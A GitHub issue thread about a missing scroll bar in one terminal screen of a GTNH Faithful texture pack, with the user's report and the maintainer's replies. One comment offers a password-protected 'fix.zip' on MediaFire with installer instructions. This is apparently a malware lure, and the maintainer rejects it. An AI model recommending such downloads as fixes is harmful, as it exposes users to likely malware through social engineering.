### ISSUE TITLE
Issue about the scroll bar missing in the ME Extended Processing Fluid Pattern Terminal

### ISSUE THREAD

**Issue by SoulAttacker** [Ethryan/GTNH-Faithful-Textures#38]
Hi! Nice day! I love your texutre pack!! But I occured the scroll bar missing in the ME Extended Processing Fluid Pattern Terminal, the detail description is as follow

## Problem Description
When I use this texutre, the **scroll bar** in the ME Extended Processing Fluid Pattern Terminal (in the left) is missing, here is the image:
![DB74EFBA8968744B2BF37D18FF33AF9E](https://github.com/user-attachments/assets/8f6d1e50-b41a-41d0-8211-9c1405036065)

And here is the image after I disabled texutre
![FD471D15-D4AB-482D-9230-D6690496C8F1](https://github.com/user-attachments/assets/fbfe935f-3a44-4acd-b05f-1d2f0b489427)

But the scroll bar acutally could work.

## Texture Version
[0.9.9](https://github.com/Ethryan/GTNH-Faithful-Textures/releases/tag/0.9.9)

## GTNH Version
2.6.1

## Other texutre pack?
No
---
If you can't reproduce this error, please feel free to contact me to get more information.

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Ethryan** [comment]
Ok, thanks for letting me know, I will fix it.

**Comment by Ethryan** [comment]
No installers in my issue repo.
